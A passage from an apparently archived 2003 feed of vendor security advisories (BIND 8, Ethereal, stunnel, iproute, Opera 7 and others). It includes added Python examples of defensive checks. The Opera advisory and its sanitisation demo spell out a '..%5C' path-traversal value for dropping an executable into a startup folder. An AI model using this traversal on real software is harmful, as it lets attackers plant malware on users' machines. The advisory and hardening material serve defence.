      Size/MD5 checksum:      874 6fe1a9a759850570f1609b77502c13bc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-11.tar.gz
      Size/MD5 checksum:    24210 11373e2cf7e659f5a69c33f3f143fcaf
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.dsc
      Size/MD5 checksum:      798 14840782d3ae928fd453a7dba225bb7f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.dsc
      Size/MD5 checksum:     1325 a77acb0743f3d3a16c00fa1cd4520e89
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.diff.gz
      Size/MD5 checksum:    66878 916d16dd46c59dd4314c45e48f33f043

  Architecture independent packages:

    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14_all.deb
      Size/MD5 checksum:  1710438 5e6cb496150391a93558652c97fb214b
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14_all.deb
      Size/MD5 checksum: 23903282 9d5cb5159bf76451dd32e75467ca6240

  alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3514858 ec88046377537587469e5527f3633c65
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3362836 f91eb5ef18c3413ae200c5b1679264cc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3512244 a46de1359655b3a05c99cd8211edd41f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-11_alpha.deb
      Size/MD5 checksum: 12799424 966ecceeb16c5bf87cc31b9178d6add9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-11_alpha.deb
      Size/MD5 checksum: 12425696 27b4defd9326ed5bac3a765977437354

  i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:  8863312 17a9c0323f06ed3eda1d17bdaf443d50
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:   230194 9e347c03ffaf24762ec8ad86f3c3c482
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:  8797832 00ab7c9bf64614112684e60595e1fe30
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:   230960 8ba2a811fb753a4b5083254c5ab402c2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:   227302 63e4524d17cb0dcf34774637293d2700
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525452 7f0208aa3bc2e9974590839d141c4ca3
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:  3527346 6b321ce7efdc5d1f641ca4e14db1807e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:   228266 e05c768db8f79e76db1dbf39200075cc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:   227834 3799038b55f03ea7fcacef73e50a7b02
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:  8704448 f8531f0d6173228a2f952e4ca80ee618
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:  3524656 c40e3230e071e5917f3c82ef8d8a3b79
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:  8661138 121c4860a88e6e0ef84941b044e655ee
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:   226934 f29016331da939466d99fde7e6dbf0c4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-12_i386.deb
      Size/MD5 checksum:  3431968 37d14ba3820e331c7701c6dbc65440c7
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525938 0b4f3c22d96777bd95673e8c6ceb45a9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525194 89b06e76e46487a2708317a7d2643519
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:  8960026 e01cd0b938c75a247cc111855632934c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:  3524794 43c7a34c6428e7d79fb660b4a434aaae
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:  8703034 a6d0829412575a9f7e6c227c5275a47b



Bind 8 cache poisoning/denial-of-service

2003-11-28

Risk level: medium

Type: DoS

Source of info: SuSE Security Team

Impact

    To resolve IP addresses to host and domain names and vice versa the
    DNS service needs to be consulted. The most popular DNS software is
    the BIND8 and BIND9 suite. The BIND8 code is vulnerable to a remote
    denial-of-service attack by poisoning the cache with authoritative
    negative responses that should not be accepted otherwise.

Overview

    To execute this attack a name server needs to be under malicious
    control and the victim's bind8 has to query this name server.
    The attacker can set a high TTL value to keep his negative record as
    long as possible in the cache of the victim. For this time the clients
    of the attacked site that rely on the bind8 service will not be able
    to reach the domain specified in the negative record.
    These records disappear only after the time interval (TTL) has elapsed.

    There is no temporary workaround for this bug.

    To make this update effective run "rcnamed restart" as root please.
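The check a resolver needs against this attack sits on the negative-cache side: take the negative TTL from the SOA in the authority section as RFC 2308 specifies, require that SOA to be in bailiwick for the queried name, and cap the TTL at a resolver-wide maximum. The block below is an added example and is not BIND 8 code; the 10800-second cap (the max-ncache-ttl default of BIND 9), the bailiwick rule and the constructed NXDOMAIN message are assumptions for illustration.

```python
"""Negative-cache admission for a DNS response: take the negative TTL from the
authority-section SOA as RFC 2308 specifies, require the SOA to be in bailiwick
for the queried name, and clamp the TTL to a resolver-wide maximum so a hostile
authoritative server cannot park an NXDOMAIN in the cache for days."""
import struct

# Assumed resolver cap (3 hours); it is not a BIND 8 value.
MAX_NCACHE_TTL = 10800
SOA, NXDOMAIN = 6, 3


def _read_name(msg, off):
    """Decode a wire-format name at off, following compression pointers."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii").lower())
        off += ln
    return ".".join(labels), (off if end is None else end)


def _read_rr(msg, off):
    """Parse one resource record; rdata_off lets SOA fields be decoded in place."""
    name, off = _read_name(msg, off)
    rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
    off += 10
    return {"name": name, "type": rtype, "ttl": ttl, "rdata_off": off}, off + rdlen


def negative_cache_ttl(msg, max_ttl=MAX_NCACHE_TTL):
    """Return (qname, ttl) if the response may be negatively cached, else None."""
    _id, flags, _qd, an, ns, _ar = struct.unpack_from("!HHHHHH", msg, 0)
    rcode = flags & 0xF
    qname, off = _read_name(msg, 12)
    off += 4                                        # skip QTYPE and QCLASS
    for _ in range(an):
        _rr, off = _read_rr(msg, off)
    if not (rcode == NXDOMAIN or (rcode == 0 and an == 0)):
        return None                                 # not a negative answer at all
    soa_ttl = None
    for _ in range(ns):
        rr, off = _read_rr(msg, off)
        if rr["type"] != SOA:
            continue
        # Bailiwick: the SOA owner must be the queried name or one of its ancestors.
        if not (qname == rr["name"] or qname.endswith("." + rr["name"])):
            return None
        # SOA rdata: MNAME, RNAME, then SERIAL REFRESH RETRY EXPIRE MINIMUM.
        _mname, o = _read_name(msg, rr["rdata_off"])
        _rname, o = _read_name(msg, o)
        minimum = struct.unpack_from("!5I", msg, o)[4]
        soa_ttl = min(rr["ttl"], minimum)           # RFC 2308 section 3
    if soa_ttl is None:
        return None                                 # no SOA, nothing to cache
    return qname, min(soa_ttl, max_ttl)             # the clamp the attack relies on missing


def _wire_name(name):
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_nxdomain(qname, zone, soa_ttl, soa_minimum):
    """Constructed NXDOMAIN response (sample input, not a capture): AA set, one SOA in authority."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8583, 1, 0, 1, 0)   # QR|AA|RD|RA, rcode 3
    question = _wire_name(qname) + struct.pack("!HH", 1, 1)
    rdata = (_wire_name("ns1." + zone) + _wire_name("hostmaster." + zone)
             + struct.pack("!5I", 2003112801, 3600, 900, 604800, soa_minimum))
    authority = _wire_name(zone) + struct.pack("!HHIH", SOA, 1, soa_ttl, len(rdata)) + rdata
    return header + question + authority
```

A 30-day TTL on the SOA comes out of negative_cache_ttl as 10800 seconds, an SOA for a zone that does not contain the queried name is refused outright, and a normal 300-second MINIMUM is kept as is. The cap does not stop a malicious server from answering NXDOMAIN; it bounds how long one bad answer can be served from the cache.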

Patches

Intel i386 Platform:
    SuSE-8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.rpm
      3d44d46f0e8397c69d53e96aba9fbd6d
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.patch.rpm
      cce1df09a0b6fb5cbbddcc462f055c64
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/bind8-8.3.4-64.src.rpm
      a980a0eca79de02f135fce1cbe84ee22

    SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.rpm
      4a46d0560eac1ca5de77c12f8abe4952
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.patch.rpm
      c8020302f6f161e9d86a3f1615304a23
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/bind8-8.2.4-336.src.rpm
      c9ee184cbd1f1722c94de9fd66f11801

    SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.rpm
      f739fdb03a7df6685e0aa026f98a0389
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.patch.rpm
      a3de26e06b689d29b4b4b08c04fa32f4
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/bind8-8.2.4-334.src.rpm
      85d8d9fee3c8a029263777a45b4af011

    SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/bind8-8.2.4-334.i386.rpm
      381c2b6f805ca30d0fefc98afaee9ba0
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/bind8-8.2.4-334.src.rpm
      97a87469cfb573bdd89f8f3a2c02264f

Sparc Platform:
    SuSE-7.3:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/bind8-8.2.4-128.sparc.rpm
      c08454b933ed2365d9d2ab1322803af6
    source rpm(s):
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/bind8-8.2.4-128.src.rpm
      827a7f56273c7a25ac40ffba728e9150

PPC Power PC Platform:
    SuSE-7.3:
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/bind8-8.2.4-243.ppc.rpm
      12f1f205c08449e945c8ad344a8e3b41
    source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/bind8-8.2.4-243.src.rpm
      177093e76b3b8d2679089a1ab1c46d0e



SGI ProPack v2.3 security update

2003-11-26

Risk level: medium

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI has released Patch 10033: SGI ProPack v2.3 security update, which includes updated RPMs for SGI ProPack v2.3 for the Altix family of systems,
in response to errata released by Red Hat.

Overview

The update contains new RPMs for stunnel (see: https://rhn.redhat.com/errata/RHSA-2003-297.html)
and glibc (see: https://rhn.redhat.com/errata/RHSA-2003-249.html).

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

Patches

Patch 10033 is available from http://support.sgi.com/
or the individual RPMs from Patch 10033 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS



Security problems in Ethereal 0.9.15

2003-11-24

Risk level: medium

Type: Remote code execution

Source of info: Red Hat Security Team

Impact

Ethereal is a program for monitoring network traffic.

A number of security issues affect Ethereal.  By exploiting these issues,
it may be possible to make Ethereal crash or run arbitrary code by
injecting a purposefully-malformed packet onto the wire or by convincing
someone to read a malformed packet trace file.

Overview

A buffer overflow in Ethereal 0.9.15 and earlier allows remote attackers
to cause a denial of service and possibly execute arbitrary code via a
malformed GTP MSISDN string.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0925 to
this issue.

Ethereal 0.9.15 and earlier allows remote attackers to cause a denial of
service (crash) via certain malformed ISAKMP or MEGACO packets.  The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0926 to this issue.

A heap-based buffer overflow in Ethereal 0.9.15 and earlier allows
remote attackers to cause a denial of service (crash) and possibly
execute arbitrary code via the SOCKS dissector.  The Common Vulnerabilities
and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0927
to this issue.

Users of Ethereal should update to these erratum packages containing
Ethereal version 0.9.16, which is not vulnerable to these issues.

Patches

Before applying this update, make sure all previously released errata
relevant to your system have been applied.
Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/ethereal-0.9.16-0.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/ethereal-0.9.16-0.72.1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/ethereal-gnome-0.9.16-0.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/ethereal-0.9.16-0.72.1.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/ethereal-gnome-0.9.16-0.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/ethereal-0.9.16-0.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/ethereal-0.9.16-0.73.1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/ethereal-gnome-0.9.16-0.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/ethereal-0.9.16-0.80.1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/ethereal-0.9.16-0.80.1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/ethereal-gnome-0.9.16-0.80.1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/ethereal-0.9.16-0.90.1.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/ethereal-0.9.16-0.90.1.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/ethereal-gnome-0.9.16-0.90.1.i386.rpm






Updated Pan packages fix denial of service vulnerability

2003-11-24

Risk level: low

Type: DoS

Source of info: Red Hat Security Team

Impact

Pan is a Gnome/GTK+ newsreader.

A bug in Pan versions prior to 0.13.4 can cause Pan to crash when parsing
an article header containing a very long author email address.  This bug
causes a crash (denial of service) but is not further exploitable.  The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0855 to this issue.

Overview

Users of Pan are advised to upgrade to these erratum packages, which
contain a backported patch correcting this issue.

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/pan-0.9.7-2.71.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/pan-0.9.7-2.71.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/pan-0.11.4-1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/pan-0.11.4-1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/pan-0.11.4-1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/pan-0.11.4-1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/pan-0.11.4-1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/pan-0.13.4-1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/pan-0.13.4-1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/pan-0.14.2-1.9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/pan-0.14.2-1.9.i386.rpm






Updated stunnel packages available

2003-11-24

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated stunnel packages are now available for Red Hat Linux 7.1, 7.2, 7.3,
and 8.0 systems.  These updates address problems stemming from improper use
of non-reentrant functions in signal handlers.

Overview

A previous advisory provided updated packages to address re-entrancy
problems in stunnel's signal-handling routines.  These updates did not
address other bugs that were found by Steve Grubb, and introduced an
additional bug, which was fixed in stunnel 3.26.

All users should upgrade to these errata packages, which address these
issues by updating stunnel to version 3.26.

NOTE: After upgrading, any instances of stunnel configured to run in daemon
mode should be restarted, and any active network connections that are
currently being serviced by stunnel should be terminated and reestablished.

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/stunnel-3.26-1.7.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/stunnel-3.26-1.7.1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/stunnel-3.26-1.7.3.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/stunnel-3.26-1.7.3.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/stunnel-3.26-1.7.3.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/stunnel-3.26-1.7.3.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/stunnel-3.26-1.7.3.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/stunnel-3.26-1.8.0.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/stunnel-3.26-1.8.0.i386.rpm






Updated iproute packages fix local security vulnerability

2003-11-24

Risk level: medium

Type: DoS

Source of info: Red Hat Security Team

Impact

Updated iproute packages that close a locally-exploitable denial of service
vulnerability are now available.

Overview

The iproute package contains advanced IP routing and network device
configuration tools.

Herbert Xu reported that iproute can accept spoofed messages sent on the
kernel netlink interface by other users on the local machine.  This could
lead to a local denial of service attack.  The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2003-0856 to
this issue. 
 
Users of iproute should upgrade to these erratum packages, which contain a
patch that checks that netlink messages actually came from the kernel.
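The fix described above decides where a netlink datagram came from before parsing it. The block below is an added example in Python, not the iproute patch: it parses a constructed NETLINK_ROUTE dump reply and drops the whole datagram unless the sender address the kernel attaches to it is port id 0, the sequence number matches the request, and every nlmsghdr fits inside the buffer. The sample messages, sequence numbers and the spoofing port id 4242 are constructed.

```python
"""Accepting netlink replies only from the kernel. Any local user can send a datagram
to a NETLINK_ROUTE socket, so a tool that parses whatever arrives can be fed bogus
routes or crashed (CAN-2003-0856). The sender address the kernel attaches to each
datagram is the trustworthy signal: the kernel is port id 0 and no user socket can
bind that id. The pid field inside nlmsghdr is written by the sender and proves nothing."""
import struct

NLMSG_HDRLEN = 16                     # nlmsghdr: u32 len, u16 type, u16 flags, u32 seq, u32 pid
NLMSG_ERROR, NLMSG_DONE = 2, 3
RTM_NEWLINK = 16
KERNEL_PORT_ID = 0


def nlmsg_align(n):
    return (n + 3) & ~3


def parse_netlink_batch(data, sender, expected_seq=None):
    """Parse one datagram as returned by recvfrom() on an AF_NETLINK socket.

    sender is Python's (pid, groups) address tuple. Returns a list of
    (type, seq, payload) tuples; raises ValueError for anything to be dropped."""
    port_id, _groups = sender
    if port_id != KERNEL_PORT_ID:
        raise ValueError("netlink datagram from port id %d, not from the kernel" % port_id)
    msgs, off = [], 0
    while off + NLMSG_HDRLEN <= len(data):
        length, mtype, _flags, seq, _hdr_pid = struct.unpack_from("=IHHII", data, off)
        if length < NLMSG_HDRLEN or off + length > len(data):
            raise ValueError("truncated or malformed nlmsghdr at offset %d" % off)
        if expected_seq is not None and seq != expected_seq:
            raise ValueError("reply sequence %d does not match request %d" % (seq, expected_seq))
        payload = data[off + NLMSG_HDRLEN:off + length]
        if mtype == NLMSG_ERROR:
            if len(payload) < 4:
                raise ValueError("short nlmsgerr")
            err = struct.unpack_from("=i", payload, 0)[0]   # negative errno, 0 is an ACK
            if err != 0:
                raise ValueError("kernel reported errno %d" % -err)
        msgs.append((mtype, seq, payload))
        if mtype == NLMSG_DONE:
            break
        off += nlmsg_align(length)
    return msgs


def is_trusted_reply(data, sender, expected_seq=None):
    """True only if the whole datagram passed the origin and framing checks."""
    try:
        parse_netlink_batch(data, sender, expected_seq)
        return True
    except ValueError:
        return False


def _nlmsg(mtype, seq, payload):
    """Constructed sample message in native byte order (not a capture)."""
    hdr = struct.pack("=IHHII", NLMSG_HDRLEN + len(payload), mtype, 0, seq, 0)
    return hdr + payload + b"\x00" * (nlmsg_align(len(payload)) - len(payload))


# A dump reply as the kernel would send it: one RTM_NEWLINK followed by NLMSG_DONE.
SAMPLE_DUMP = (_nlmsg(RTM_NEWLINK, 7, b"\x00\x00\x01\x00\x02\x00\x00\x00")
               + _nlmsg(NLMSG_DONE, 7, b"\x00" * 4))
# The same bytes arriving from a local user process (port id 4242) must be ignored.
KERNEL_SENDER = (0, 0)
SPOOFED_SENDER = (4242, 0)
```

On a real socket the sender tuple comes from socket.recvfrom(); the point of the example is that the origin check happens before any byte of the payload is interpreted, so a spoofed datagram never reaches the parsing code at all.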

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/iproute-2.4.7-7.71.1.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/iproute-2.4.7-7.71.1.i386.rpm

Red Hat Linux 7.1 for iSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/iSeries/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/iproute-2.4.7-7.71ppc.1.ppc.rpm

Red Hat Linux 7.1 for pSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/pSeries/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/iproute-2.4.7-7.71ppc.1.ppc.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/iproute-2.4.7-7.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/iproute-2.4.7-7.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/iproute-2.4.7-7.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/iproute-2.4.7-7.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/iproute-2.4.7-7.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/iproute-2.4.7-7.80.1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/iproute-2.4.7-7.80.1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/iproute-2.4.7-7.90.1.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/iproute-2.4.7-7.90.1.i386.rpm




Security hole in Opera 7

2003-11-22

Risk level: Critical

Type: remote system compromise

Source of info: Operash

Impact

Opera 7 has a serious security hole in the auto-install function
  for skin files and configuration files.
  When a user visits a malicious web site, the attacker can exploit
  this hole to create a file with an arbitrary name at an arbitrary
  path on the user's local disk from a web page.

Overview

Workaround
==========
Main Menu "Preferences" -> "File Types", MIME-type list
  (uncheck "Hide file types opened with Opera"):

    application/x-opera-skin
    application/x-opera-configuration-skin
    application/x-opera-configuration-mouse
    application/x-opera-configuration-keyboard
    application/x-opera-configuration-toolbar
    application/x-opera-configuration-menu

  If you change the action for all of the MIME types above from
  "Open with Opera" to "Show download dialog" (or similar),
  the auto-install function is disabled and the vulnerability
  cannot be triggered.

  To re-enable the auto-install function, change the action for
  these MIME types back to "Open with Opera".


TECHNICAL DETAILS
======================

  Opera 7 has an auto-install function for skin files, and version
  7.10 or later has the same function for configuration files.
  The auto-install function runs when Opera receives from a remote
  server a file served with one of the MIME types
  "application/x-opera-configuration-XXXXX" or
  "application/x-opera-skin".
  When Opera receives a file with one of these MIME types, whether
  or not the user accepts it, the file is automatically saved, under
  the name used while downloading, to the configuration-file
  directory in the user directory or the installation directory.
  This automatically saved file name is not sanitized sufficiently.
  Therefore, when the file name contains the illegal character
  string '..%5C', the file can be saved in any directory reachable
  by a relative path, even one outside the expected scope.
  (This is restricted to directories that Opera's process can write
  to; existing files cannot be overwritten or deleted.)

  For example, if an executable file were saved in the start-up
  directory, it would run when the user next rebooted the computer,
  exposing the user to virus infection or a Trojan horse running
  inside. Moreover, the executable could be one that damages the
  computer, deletes data, or does anything else malicious.
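The defect above is a file name that is filtered before it is percent-decoded, so the separator appears only after the check has passed. The following added example (not Opera's code) shows that pattern beside a hardened version that decodes first, treats the backslash as a separator, refuses any directory component instead of repairing it, and confines the final path as a second line of defence. SKIN_DIR and the file names are assumptions.

```python
"""Confining a server-supplied file name to the directory it is meant for. The
vulnerable function checks the name before percent-decoding it, so '..%5C' passes
and turns into '..\\' afterwards; the hardened one decodes first, refuses any
directory component under either separator convention, and still confines the
final path as a second line of defence."""
import os
from urllib.parse import unquote

SKIN_DIR = "/home/user/.opera/skin"       # assumed install directory


def naive_target(filename, base=SKIN_DIR):
    """Vulnerable: filters separators in the raw name, then decodes on the way to disk."""
    if "/" in filename or "\\" in filename:
        return None
    return os.path.join(base, unquote(filename))   # '..%5C' becomes '..\\' here


def safe_target(filename, base=SKIN_DIR):
    """Hardened: returns the absolute path to write to, or None to refuse the file."""
    name = filename
    for _ in range(3):                              # undo double or triple encoding
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    name = name.replace("\\", "/")                  # backslash is a separator on Windows
    if "/" in name or name in ("", ".", "..") or "\x00" in name:
        return None                                 # refuse, do not silently repair
    if not all(c.isalnum() or c in "._-" for c in name):
        return None                                 # conservative allow-list
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, target]) != base_real:
        return None                                 # defence in depth after the allow-list
    return target
```

naive_target happily returns a path containing '..\\..\\Startup\\evil.exe' for the encoded input, which on Windows resolves outside the skin directory; safe_target refuses it, refuses a double-encoded variant, refuses an embedded NUL, and accepts a plain skin file name.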

  In addition, unlike vulnerabilities such as buffer overflows,
  this vulnerability requires no advanced skills to exploit.
  So we assume this is highly dangerous for users.


  Additional Description:

  Mr. S. G. Masood reported a similar vulnerability on 12 Nov 2003,
  while we were researching this vulnerability.
  It was announced that the vulnerability Mr. Masood reported was
  fixed in version 7.22.
  However, the issue we researched has higher severity and has not
  been fixed yet, even in version 7.22.


Patches

Upgrade to 7.23.
www.opera.com



SGI Advanced Linux Environment security update #5

2003-11-19

Risk level: important

Type: many types

Source of info: SGI Security Team

Impact

